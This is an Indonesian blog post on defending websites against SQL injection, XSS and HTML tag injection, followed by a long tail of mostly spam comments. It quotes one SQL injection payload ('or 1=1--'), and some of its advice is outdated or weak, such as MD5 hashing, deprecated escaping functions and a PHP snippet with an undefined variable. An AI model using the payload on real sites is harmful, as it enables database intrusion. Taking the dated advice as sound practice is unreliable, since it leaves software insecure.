Beranda > TIPS-TRIK > CARA MENCEGAH SQL INJECTION

CARA MENCEGAH SQL INJECTION

CARA MENCEGAH SQL INJECTION

Pengamanan Web Server Dan Site (Versi SQL Injection, JS, XSS, CSS)

Percaya atau tidak kalau mengamankan web itu lebih sulit daripada merusak tampilan atau merusak database dari web tersebut. Maraknya deface dan hacking yg dilakukan oleh beberapa orang yg dikarenakan kesalahan konfigurasi system atau kurangnya pengetahuan webmaster masih sering dilakukan.

1. Pencegahan SQL Injection, contoh sintak SQL Injection :

?or 1=1–

Penyerangan melalui teknik ini sama artinya dng penyerangan terhadap database. Untuk melakukan pencegahan terhadap SQL Injection ini, pertama seperti kita ketahui karakter ( ? ), (–), (NULL), (\x00), (\n), (\r), (?), (/), (/x1a) merupakan biang masalah dari SQL ini, tips nya yaitu escape semua special karakter tersebut untuk php/mysql:

mysql_real_escape_string. Atau dengan cara kedua yaitu filter semua karakter yang masuk dan hanya mengijinkan karakter ttt yg dpt di inputkan. Yg perlu diingat, Sql injection ini tidak hanya bisa masuk melalui inputan dari user tetapi juga bisa melalui URL dengan bantuan karakter ( ; ) yang arti dari karakter itu adalah ?baris dibelakang ; akan ikut di eksekusi?. Disarankan, abaikan semua karakter setelah alamat URL. Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )

good_password_chars =

“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

validatepassword = true

for i = 1 to len( input )

c = mid( input, i, 1 )

if ( InStr( good_password_chars, c ) = 0 ) then

validatepassword = false

exit function

end if

next

end function

2. Pencegahan XSS (Cross Side Scripting), contoh script XSS :
Pencurian cookie biasanya sering dilakukan melalui teknik ini. Dengan ditemukan kelemahan XSS ini maka user dapat menjalankan script melalui form, buku tamu atau URL. Walaupun perubahan yang bisa dilakukan hanya bersifat clien tetapi bila cookie dicuri lain soal…..! Jadi untuk mencegah XSS adalah dengan Konversi < dan > menjadi menjadi lt; dan gt; dan dengan diawali karakter & (itu berarti pengganti nilai < dan > dlm tag HTML) dan filter semua inputan dari user.

3. Pemasukkan Tag HTML.
Biasa cara ini kebanyakan dilakukan melalui buku tamu. Dengan cara ini seseorang dapat menambahkan tampilan sesuai dengan keinginan mereka. Dari beberapa pengalaman, biasanya para web master melakukan pencegahan ini dengan menambahkan karakter tertentu di awal karakter < atau >. Tapi fungsi untuk mencegah tag HTML sekarang sudah disediakan langsung oleh PHP jadi kita tinggal pakai saja (htmlspecialchars).

Contoh script :

function cleanup($value=””, $preserve=””, $tag=””) {

if (empty($preserve)) {

$value=strip_tags($value, $allowed_tags);

}

$value=htmlspecialchars($value);

return $value;

}

4. Batasi penggunaan Java Script dan jangan menggunakan java script untuk membuat sesuatu yang akan meyangkut hidup matinya web anda, karena java script bersifat client dan membuat akses yang akan sangat lambat. Disarankan gunakan aplikasi yang lain seperti PHP dan ASP karena sudah bersifat server.

5. Penyimpanan file database sebaiknya disimpan dlm directory private. Jangan pernah menyimpannya di directory public yang memungkinkan orang lain dapat mengaksesnya. Tapi biasanya di web hosting sudah menyediakan direktori khusus untuk database. Dalam keamanan database harus dilindungi dengan password. Koneksi sebaiknya di enkripsi dengan SSL. Data yang penting jangan disimpan secara langsung melainkan sebagai hash (md5) atau modifikasi dari md5 yaitu SHA-256 dan SHA-512 atau terenkripsi dengan bahasa pemrograman lain misalnya PHP.

6. Berhati hatilah memilih webhosting, itu sudah kami buktikan. Sehebat apapun web yang dibuat walaupun pengecekan password dibuat 2 kali dan di encrypt berapa kalipun kalau sudah server yang diserang kita tidak bisa berbuat apa apa.

Sumber :
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA
http://mr-amateur.co.cc

Kategori:TIPS-TRIK
  1. budi
    Januari 14, 2011 pukul 1:00 pm

    Bagaimana memfilter masukan ‘id’ pada url yang menggunakan querystring, misal: detil.php?id=123. filter seperti apa yang dibutuhkan?

  2. ario pamungkas bayu aji
    November 3, 2011 pukul 1:14 am

    kalo pake bahasa asp gimana cara mencegah sql injection?

  3. Januari 7, 2012 pukul 11:16 am

    @budi, ada baeknya menggunakan metode POST untuk input data. agar lebih scure

    @ario, mas ario menggunakan componet apa untuk akses kedatabasenya? kalo menggunakan ado, pake object SQLParameter ketika CRUD, dan jangan lupa pula length textbox tidak lebih besar dari field length di table database.

  4. Maret 15, 2013 pukul 6:12 am

    I have been exploring for a little bit for any high-quality articles or weblog posts in this kind of area .

    Exploring in Yahoo I eventually stumbled upon this web site.
    Reading this information So i am glad to exhibit that I’ve an incredibly good uncanny feeling I discovered just what I needed. I so much indisputably will make certain to do not overlook this site and provides it a look on a constant basis.

  5. Mei 13, 2013 pukul 4:36 am

    This article will help the internet viewers for setting up new webpage or
    even a blog from start to end.

  6. Mei 25, 2013 pukul 6:47 am

    Hey! I just wish to give an enormous thumbs up for the nice information you
    may have here on this post. I will be coming back to your blog for more soon.

  7. Mei 31, 2013 pukul 10:50 am

    Howdy! I simply want to give a huge thumbs up for the nice info
    you might have right here on this post. I will
    be coming back to your blog for extra soon.

  8. Juli 21, 2013 pukul 6:11 am

    You should take part in a contest for one of the most useful websites on the
    internet. I am going to highly recommend this web site!

  9. Juli 22, 2013 pukul 8:08 am

    I drop a comment whenever I especially enjoy a post on a website or if I have something to contribute to the
    discussion. It is a result of the passion communicated in the post I browsed.
    And on this article CARA MENCEGAH SQL INJECTION | ILMU KOMPUTER.
    I was excited enough to write a comment🙂 I actually do have a few questions for you if
    you usually do not mind. Could it be simply
    me or do a few of these remarks look as if they are written by brain dead people?😛 And, if you are posting on additional sites, I’d like to keep up with you. Could you list every one of your social sites like your twitter feed, Facebook page or linkedin profile?

  10. September 16, 2013 pukul 1:29 pm

    I am not surde where you are getting your information, but good topic.
    I needs to spend some time learning muhh more or understanding more.
    Thanks for fantastic info I wwas lookimg for this information for my mission.

  11. dang_6477
    Februari 13, 2014 pukul 4:27 am

    keren nih artikelnya, emang masalah2 kek gini yg suka buat pusing web admin & programmernya

  12. Februari 14, 2014 pukul 10:40 am

    This paragraph will assist the internet viewers for building up
    new web site or even a weblog from start to end.

  13. Februari 17, 2014 pukul 11:44 pm

    Heya i’m for the first time here. I found this board and I
    find It truly useful & it helped me out much. I hope to give something back and help others like you aided
    me.

  14. Februari 24, 2014 pukul 7:07 pm

    I always used to read piece of writing in news papers but now as I am a user of web thus from now I am using net for articles or reviews, thanks to web.

  15. Februari 28, 2014 pukul 3:55 am

    Här kan vi vara instängd i den och vi kommer att öva på stegen med hjälp
    av boken som en guide. De är fortfarande
    många låga värdet kort som behandlades detta antal dock kommer
    att öka dramatiskt i nästa match. Utsikterna att bli ett online spelare hetsar upp
    dig tillsammans med att vinna några stora pengar, men
    du kan räkna med att kongressen kommer att legalisering och
    beskatta 9. Drivs av RTG Software, Las Vegas och Atlantic City.

  16. Maret 2, 2014 pukul 11:09 am

    Its like you read my mind! You seem to know
    so much about this, like you wrote the book in it or something.
    I think that you can do with a few pics to drive
    the message home a bit, but other than that, this is great blog.
    An excellent read. I will certainly be back.

  17. Maret 3, 2014 pukul 12:45 pm

    Link exchange is nothing else except it is simply placing the other person’s website link on
    your page at proper place and other person will also do similar in favor of you.

  18. Maret 5, 2014 pukul 9:12 am

    Hi! Would you mind if I share your blog with my zynga group?
    There’s a lot of people that I think would
    really appreciate your content. Please let me know.
    Many thanks

  19. Maret 16, 2014 pukul 12:26 pm

    It also offers live score updates of the favorite game activities.

    I am sure if anybody was to work with an iPhone for a month that the would not go back to
    any other one. This game is simply as addictive as tap retailer.

  20. April 8, 2014 pukul 10:14 am

    Because these sites are free and stuffed with lonely guys,
    you have to stand out from the group. Attempt some of these enriching readstheyll recreate those elegant worlds you adore so a
    lot.

  21. April 18, 2014 pukul 10:59 pm

    Who knew a big sale on a soon-to-be previous phone
    could predict the newest model’s release? If Iphone 5 comes with
    LTE support, this is a purpose enough to get the gadget with
    out any ado.

  22. April 25, 2014 pukul 7:09 am

    You can even go to an AT&T company retail shop and inquire about a refurbished unlocked Apple iphone or a locked 1.
    And Apple can occasionally be whimsical, and reject applications from the Application Store for
    perplexing reasons.

  23. April 29, 2014 pukul 12:08 pm

    It can actually establish the songs that you just sing, having its sophisticated speech recognition software.
    Googleearth brings satellite image of any landscape in the
    world to your iPhone.

  24. April 30, 2014 pukul 1:03 pm

    You can also join your iPhone for your Computer, notebook
    or any unit to do different jobs. Find The greater put type in order to accomplish this part.
    This game is simply as addictive as touch retailer.

  25. April 30, 2014 pukul 6:54 pm

    It absolutely was excellent to see the looks on all their faces.
    Nonetheless, you’ll find fantastic photos of the Sesame Street figures supplied with this page.
    You will find everything here had a need to make St.

  26. Mei 17, 2014 pukul 1:39 pm

    And the add-ons are this kind of as- Iphone 4
    Cases & Apple iphone Covers. Nevertheless, this discussion will
    be place to relaxation when the Apple iphone 5 launch date arrives subsequent Friday.

  27. Mei 22, 2014 pukul 8:18 pm

    All the above Valentines coloring sheets are liberated to print.
    A Princess Jasmine Arabian Nights kid birthday party theme is
    a fun kids party. First Institution supplies a range of cat coloring pages.

  28. Juni 2, 2014 pukul 10:05 am

    Many computer systems shed pace due to “registry mistakes”.
    And then the phrase is that the Iphone 5 will be available
    in shops as early as on September 21. All in all, you simply have to attempt this wondrous application!

  29. Juli 8, 2014 pukul 9:47 am

    Excellent post however I was wondering if you could write
    a litte more on this subject? I’d be very grateful if you could elaborate a little bit further.

    Thank you!

  30. Juli 14, 2014 pukul 5:37 pm

    Hey there! I simply would like to offer you a huge thumbs
    up for your great information you have here on this post.
    I’ll be returning to your web site for more soon.

  31. Juli 18, 2014 pukul 8:05 am

    Good day I am so glad I found your webpage, I really found
    you by accident, while I was searching on Aol for something
    else, Regardless I am here now and would just like to say thanks for a marvelous
    post and a all round interesting blog (I also love the theme/design), I don’t have time
    to browse it all at the minute but I have bookmarked it and also added in your RSS feeds, so when I have time I will
    be back to read a lot more, Please do keep up the great job.

  32. Juli 18, 2014 pukul 8:13 am

    What i don’t realize is in fact how you’re now not really a lot more well-preferred than you might be now.

    You’re so intelligent. You know therefore significantly in relation to this subject, made me
    individually believe it from so many numerous angles.
    Its like men and women don’t seem to be fascinated until it is
    one thing to accomplish with Girl gaga! Your individual stuffs nice.
    Always handle it up!

  33. Juli 23, 2014 pukul 9:15 am

    You really make it appear so easy together with your presentation however I find this matter to be actually one thing which I believe I would by no means understand.

    It seems too complicated and very wide for me. I’m looking
    ahead for your next publish, I’ll try to get the cling of it!

  34. Agustus 19, 2014 pukul 5:12 am

    Aceasta implică libertate în interiorul corpului pentru a
    continua să circule și energie . Dacă el se
    simte ca un eșec , spune-i că nu este și că doar tu crezi
    în puterea lui intern . Pun pariu prietena ta ar prefera -ai făcut !

  35. Agustus 27, 2014 pukul 6:03 am

    Excellent post. I was checking constantly this blog and I’m impressed!

    Extremely useful information specially the last part🙂 I care for such info much.

    I was seeking this particular information for a long time.
    Thank you and best of luck.

  36. September 7, 2014 pukul 12:05 am

    Hey there! This is kind of off topic but I need some guidance from
    an established blog. Is it very difficult to set up your own blog?
    I’m not very techincal but I can figure things out
    pretty quick. I’m thinking about setting up my own but
    I’m not sure where to start. Do you have any ideas or suggestions?

    Thank you

  37. September 7, 2014 pukul 5:01 pm

    Hey there! I just wanted to ask if you ever have
    any problems with hackers? My last blog (wordpress) was hacked and
    I ended up losing many months of hard work due to no back up.
    Do you have any methods to protect against hackers?

  38. September 10, 2014 pukul 4:39 am

    Good day! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.

    If you know of any please share. Cheers!

  39. September 21, 2014 pukul 1:28 am

    What’s up i am kavin, its my first time to commenting anyplace, when i read this paragraph i
    thought i could also make comment due to this good article.

  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: